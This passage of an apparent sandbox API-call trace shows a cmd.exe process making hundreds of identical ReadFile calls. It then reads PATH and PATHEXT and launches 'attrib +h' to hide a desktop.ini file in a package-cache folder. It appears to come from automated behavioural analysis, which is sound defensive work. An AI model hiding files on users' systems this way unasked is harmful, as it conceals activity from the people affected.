lpOverlapped=0x0) returned 1 [0205.943] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.943] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.943] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.943] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.943] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.944] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.944] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.944] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.944] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, 
lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.944] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.944] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.944] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.944] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.944] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.944] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.945] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.945] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.945] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: 
lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.945] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.945] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.945] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.945] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.945] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.945] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.946] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.946] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.946] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, 
lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.946] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.946] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.946] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.946] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.946] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.946] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.947] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.947] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.947] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, 
lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.947] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.947] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.947] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.947] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.947] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.947] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.947] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.948] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.948] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, 
nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.948] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.948] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.948] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.948] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.948] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.948] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.948] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.949] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.949] ReadFile (in: hFile=0x58, 
lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.949] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.949] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.949] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.949] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.949] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.949] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.949] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.949] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.950] ReadFile 
(in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.950] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.950] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.950] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.950] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.950] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.950] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.950] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.950] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 
[0205.950] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.951] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.951] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.951] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.951] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.951] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.951] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.951] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.951] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, 
lpOverlapped=0x0) returned 1 [0205.951] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.952] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.952] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.952] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.952] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.952] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.952] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.952] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.952] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, 
lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.952] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.982] FindClose (in: hFindFile=0x2c0830 | out: hFindFile=0x2c0830) returned 1 [0205.982] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0206.146] _close (_FileHandle=3) returned 0 [0206.147] GetConsoleTitleW (in: lpConsoleTitle=0x12f338, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0206.147] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0206.147] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0206.147] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0206.147] FindClose (in: hFindFile=0x2c0830 | out: hFindFile=0x2c0830) returned 1 [0206.147] FindClose (in: hFindFile=0x2c0830 | out: hFindFile=0x2c0830) returned 1 [0206.147] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0206.148] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0206.148] GetConsoleTitleW (in: lpConsoleTitle=0x12f0cc, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0206.148] InitializeProcThreadAttributeList (in: lpAttributeList=0x12ef54, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x12f01c | out: lpAttributeList=0x12ef54, lpSize=0x12f01c) returned 1 [0206.148] UpdateProcThreadAttribute (in: lpAttributeList=0x12ef54, dwFlags=0x0, Attribute=0x60001, lpValue=0x12f014, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x12ef54, lpPreviousValue=0x0) returned 1 [0206.148] GetStartupInfoW (in: 
lpStartupInfo=0x12ef10 | out: lpStartupInfo=0x12ef10*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0206.148] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0206.148] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="attrib +h \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{E6E75~1\\desktop.ini\" ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x12efb0*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="attrib +h \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{E6E75~1\\desktop.ini\" ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, 